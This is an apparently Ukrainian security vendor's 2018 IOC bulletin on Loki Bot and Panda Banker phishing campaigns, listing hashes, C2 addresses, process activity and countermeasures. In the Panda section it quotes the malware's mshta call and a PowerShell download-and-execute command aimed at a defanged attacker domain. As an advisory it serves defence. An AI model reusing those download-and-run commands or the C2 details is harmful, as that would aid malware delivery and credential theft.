Archive | 03/03/2018

IOC_lokibot_panda_010318

Доброго дня, панове.

1/03/18 було зафіксовано розсилку двох зразків – #Loki Bot та #Panda Banker.

Рівень загрози по обом – середній.

Для тих, хто врахував наші попередні рекомендації – низький.

Трохи аналітики:

#lokibot

  • Доставка – scan90020_pdf.exe у оболонці ISO
  • Запуск шкідливого коду не потребує прав Адміністратора
  • Спроб закріплення не проводив
  • Даний тип ШПЗ застосовується для збору інформації та крадіжки облікових даних

 

#panda

  • Доставка – через документ із макросом, який активується при закритті документу (таке вже було)
  • Завантаження основної частини відбувається засобами PowerShell
  • Скрипт містить чітку адресу та чітке ім’я файлу
  • Запуск шкідливого коду не потребує прав Адміністратора
  • Даний тип ШПЗ застосовується для крадіжки облікових даних та інформації ДБО

 Схема атаки:

#lokibot

email > Attach (ISO) > mount/unpack > scan90020_pdf.exe > AppData\Roaming\39B01F\FA74A3.exe

#panda

email > Attach (DOCM) > macro > close document > mshta > powershell > GET > AppData\Roaming\5a33bf37.exe

Маркери IOC:

#lokibot

ISO файл:

SHA-256        d53ca456031625921dd0553fdc7de2d4493f91cc3250b90534eecd92d350d420
File name   scan90020_pdf.iso
File size      1.19 MB

 

Основна частина:

SHA-256    b3ef6e19abe812f3eae507cf38d58f7823e7fc9bd8fc9585601ba2401c79f229
File name   SCAN9002.EXE
File size      423.5 KB

 

#panda

Документ-приманка:

SHA-256        902ce29951425b4fd985566a2f3c01414e3a654908471ea942d089629a5602ae
File name   JWLC_Request.doc (docm)
File size      62.44 KB

 

Основна частина:

SHA-256        b8575977adc0706b93a58f8be8905f9c8d10b75670bedde7dfeaf3bca2a6129f
File name   bomberf.class >> AppData\Roaming\5a33bf37.exe
File size      587 KB

 

Мережеві IOC:

#lokibot

Передача зібраної інформації на C2

82.118.242.100   www.kelsandsons{.} info      POST /kelvin/Panel/five/fre.php HTTP/1.0    814   HTTP

 

Тут ключовий момент – User Agent, який використовує зразок:

POST /kelvin/Panel/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: www.kelsandsons{.} info

 

Активність скомпрометованої системи:

[System Process] 0      TCP   82.118.242.100   80     TIME_WAIT                                                                       
[System Process] 0      TCP   82.118.242.100   80     TIME_WAIT                                                                       
[System Process] 0      TCP   82.118.242.100   80     TIME_WAIT

 

#panda

Завантаження інструкцій для PowerShell

86.126.123.126   HTTP 389   jnossidjfnweqrfew{.} com     GET /OU/stem.php?utma=bomberk HTTP/1.1

 

Завантаження основної частини засобами PowerShell

86.126.123.126   HTTP 142   jnossidjfnweqrfew{.} com     GET /NOB/bomberk.class HTTP/1.1

 

Сповіщення про невдачу завантаження (після того як основна частина була видалена)

86.126.123.126   HTTP 125   jnossidjfnweqrfew{.} com     GET /OU/freddie.php?l=bomberk HTTP/1.1

 

Визначення Public IP через DNS запит

208.67.222.222   DNS  76     Standard query 0x0003 AAAA myip.opendns.com

 

Шифрований зв’язок із сервером контролю

45.58.122.69      TCP   54     onozhrnyainwmawjndw{.}net 49427 → 443 [ACK] Seq=207 Ack=941 Win=63300 Len=0

 

Активність по процесам:

#lokibot

Після запуску дублює свій виклик, копіює свою копію у AppData (шлях статичний) та ініціює з’єднання із С2 через системні процеси

Х:\scan90020_pdf.exe
C:\Users\operator\AppData\Roaming\39B01F\FA74A3.exe

 

#panda

При закритті документу-приманки активується макрос, який запускає процес завантаження інструкцій для PowerShell

C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE
C:\Windows\splwow64.exe
"C:\Windows\System32\mshta.exe" http://jnossidjfnweqrfew{.} com/OU/stem.php?utma=bomber

 

Виконання поданих інструкцій на PowerShell призводить до запуску та завантаження основної частини

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"  -Exec Bypass -NoExit -Command 
(New-Object System.Net.WebClient).DownloadFile('http://jnossidjfnweqrfew{.} com/NOB/bomberk.class', $env:APPDATA + '\\6fa293d7.exe'); 
Start-Process $env:APPDATA'\\6fa293d7.exe'; (New-Object System.Net.WebClient).DownloadString('http://jnossidjfnweqrfew{.} com/OU/freddie.php?l=bomberk');  ;

 

Запуск основної частини призводить до інжекту в svchost, explorer, копіювання власного тіла у підкаталог та закріпленню

"C:\Users\operator\AppData\Roaming\6fa293d7.exe"
C:\Windows\system32\svchost.exe
c:\users\operator\appdata\roaming\microsoft\atltcse\adsn32gt.exe

 

Закріплення через реєстр

corrprov    Limitless 1930s Volume Preunderstanding Reseller    XMedia Recode        
c:\users\operator\appdata\roaming\microsoft\atltcse\adsn32gt.exe        19.01.2015 19:01  

 

Визначення Public IP через DNS запити

cmd /C "nslookup myip.opendns{.} com resolver1.opendns{.} com > C:\tmp\AA49.bi1"
nslookup  myip.opendns{.} com resolver1.opendns{.} com
cmd /C "echo -------- >> C:\tmp\AA49.bi1"

 

Контрзаходи:

  • Перевірка журналів мережевого обладнання по наданим маркерам
  • (#lokibot) Блокування приєднань типу ISO або активація механізму Device Control для блокування зчитування exe з віртуального приводу

Нагадую, що засобами Device Control можна ефективно заблокувати звернення до файлів на носіях, у тому числі і на ISO

  • (#panda) Блокування доступу до мережі Інтернет для процесів mshta.exe та PowerShell (варіант 1й)
  • (#panda) Жорсткий фільтр команд PowerShell (сигнатури HIPS – McAfee ENS)

Нагадую, що в ENS є модуль HIPS, сигнатурами якого можна обмежити виклик PowerShell

  • (#panda) Заборона передачі інструкцій winword > mshta > powershell (користувацьке правило Access Protection)
  • (#panda) Деактивація макросів в параметрах MS Office
  • (#panda) Заборона реєстрації в переліку автозавантажень (вбудоване правило Access Protection)

Нагадую як виглядає вбудоване правило

 

  • (обоє) Заборона створення та зчитування/запуску *.EXE з каталогів профілю користувача %appdata%, а не лише у %temp% !
  • Посилена фільтрація запускних та скриптових файлів по каналам Web та Email
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR